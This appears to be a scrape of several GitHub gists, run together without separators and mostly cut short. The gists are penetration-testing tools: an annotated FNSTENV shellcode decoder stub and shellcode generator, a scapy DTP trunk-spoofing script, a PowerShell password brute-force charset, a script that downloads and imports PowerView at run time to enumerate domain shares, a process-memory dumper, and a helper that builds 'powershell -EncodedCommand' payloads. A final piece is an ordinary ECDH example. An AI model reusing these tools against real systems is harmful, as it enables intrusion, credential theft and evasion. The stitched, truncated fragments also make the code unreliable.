#
# _payload:
# 00002014 B8DAFFFECD mov eax, 0xcdfeffda ; Move the initialisation vector (IV) into EAX. This is the initial key, XREF=_main+13
# 00002019 DAD3 fcmovbe st0, st3 ; Conditional FPU move of ST3 into ST0 (taken when CF or ZF is set). Its result is irrelevant; it is here so that the FNSTENV below has a "last executed FPU instruction" address to record.
# 0000201b D97424F4 fnstenv dword [ss:esp-0xc] ; Stores the FPU environment at the designated memory location. This includes the FPU instruction pointer, i.e. the address of the fcmovbe above. Note the offset from ESP (Stack Pointer): it places that stored address exactly at ESP.
# 0000201f 5B pop ebx ; Pop the address saved by FNSTENV off the stack into EBX.
# 00002020 29C9 sub ecx, ecx ; Zero out ECX
# 00002022 B10E mov cl, 0xe ; ECX is loop counter
#
# Nasm code for the stub.
# ________
#
# global start
#
#
# section .text
#
# start:
# mov rax, 0x0123456789ABCDEF ; set the key.
; nasm -f macho64 test.asm -o test.o \
; && ld -o test -segprot __DATA rwx rwx test.o
global start
section .text
start:
mov rax, 0x0123456789ABCDEF ; Set the initial key (IV)
lea rbx, [rel $] ; Place current instruction pointer RIP in RBX
import random
import struct
import re
import ctypes
class ShellcodeGenerator:
__QWORD_SIZE = 8
__iv = 0x0000000000000000
__payload = ""
from scapy.all import *
from scapy.contrib.dtp import *
# DTP status byte value used by this script; the name suggests the "trunk"
# bit — confirm against scapy.contrib.dtp's field definitions.
FLAG_TRUNK = 0x80
# Retry count and inter-send delay (presumably seconds); the loop that
# consumes them lies below the visible excerpt.
RETRY = 10
SEND_WAIT = 5
# Network interface to send on (macOS-style name; adjust for the host).
iface = 'en0'
# Destination MAC: 01:00:0c:cc:cc:cc is the Cisco multicast address that
# DTP (and CDP/VTP) frames are addressed to.
dtpmac = "01:00:0c:cc:cc:cc"
# Source MAC read from the chosen interface via scapy's helper.
mymac = get_if_hwaddr(iface)
FrankSpierings / brute.ps1
Last active March 11, 2024 08:41
Powershell - Brute force procedure
# Candidate alphabet for the brute-force procedure: ASCII digits, then
# lowercase, then uppercase letters. The range operator yields the code
# points, so each element is cast back to [char]; Select-Object -Unique
# guards against duplicates (the three ranges do not overlap, so it is a
# no-op here but keeps the list safe if more ranges are added).
$charset = @(
  [char]'0'..[char]'9'
  [char]'a'..[char]'z'
  [char]'A'..[char]'Z'
) | ForEach-Object { [char]$_ } | Select-Object -Unique
function Get-NextPassword() {
param(
$Password
)
FrankSpierings / FindShares.ps1
Created December 25, 2015 09:41
Uses PowerView (downloaded at run time) to enumerate all domain computers and try to access their shares.
# Regex presumably applied to discovered computer names (here: names
# starting with C or T); how it is applied is below the visible excerpt.
$host_filter = '^C|^T'
# Share name to filter out, presumably. Single-quoted on purpose so the
# '$' in IPC$ stays literal instead of being expanded as a variable.
$share_filter = 'IPC$'
# PowerView is fetched live from the 'master' branch. This is unpinned
# remote code: whatever sits at this URL at run time executes with this
# script's privileges. Pin to a specific commit and verify the file's
# hash before importing it.
$depends_url = "https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1"
# Plain-text log of found shares, plus a sibling .xml file (presumably a
# CLIXML serialisation of the same results — confirm against the code below).
$logfile = "foundshares.log"
$serialobj = $("{0}.xml" -f $logfile)
# Make Write-Debug output visible; swap to the commented line to silence it.
$DebugPreference = "Continue"
#$DebugPreference = "SilentlyContinue"
#Import dependency
FrankSpierings / procdump.py
Last active December 25, 2015 14:25
Dump process memory using python3
#! /usr/bin/env python
#
# Modification from:
# https://unix.stackexchange.com/questions/6267/how-to-re-load-all-running-applications-from-swap-space-into-ram/6271
#
# For non-root use, check that 'cat /proc/sys/kernel/yama/ptrace_scope' prints 0
# Reference: https://www.kernel.org/doc/Documentation/security/Yama.txt
#
import re
import sys
# Make Write-Debug output visible (PowerShell's default is SilentlyContinue).
$DebugPreference = "Continue"
function Create-Base64Payload()
{
param(
$Filename
)
$content = (Get-Content -Path $Filename | Out-String)
$command = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($content))
Write-Debug "[+] Mind the newlines!"
Write-Debug "[+] Powershell.exe -EncodedCommand $command"
FrankSpierings / ECDiffieHellmanP256.ps1
Last active December 15, 2020 20:52
Powershell ECDiffieHellmanP256 Example
# Two fresh ephemeral P-256 key pairs, one per party (Alice / Bob).
[System.Security.Cryptography.CngKey]$aliceKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
[System.Security.Cryptography.CngKey]$bobKey = [System.Security.Cryptography.CngKey]::Create([System.Security.Cryptography.CngAlgorithm]::ECDiffieHellmanP256)
# Public halves only, as CNG ECC public blobs — this is what would travel
# over the wire. Nothing in this example authenticates the blobs; a real
# protocol must bind them to an identity (signatures or a trusted
# distribution channel), otherwise the exchange is only secure against a
# passive observer.
[Byte[]]$alicePubKeyBlob = $aliceKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
[Byte[]]$bobPubKeyBlob = $bobKey.Export([System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
# Alice's side: bind her private key to an ECDH algorithm object ...
[System.Security.Cryptography.ECDiffieHellmanCng]$aliceAlgorithm = New-Object System.Security.Cryptography.ECDiffieHellmanCng($aliceKey)
# ... re-import Bob's public blob as a CngKey ...
[System.Security.Cryptography.CngKey]$bobPubKey = [System.Security.Cryptography.CngKey]::Import($bobPubKeyBlob, [System.Security.Cryptography.CngKeyBlobFormat]::EccPublicBlob)
# ... and derive the shared key material. Note this is not the raw ECDH
# point: ECDiffieHellmanCng runs it through its KeyDerivationFunction
# (Hash/SHA-256 by default, as far as I recall — confirm), so Bob's side must
# use identical KDF settings to arrive at the same bytes.
[Byte[]]$aliceSymKey = $aliceAlgorithm.DeriveKeyMaterial($bobPubKey)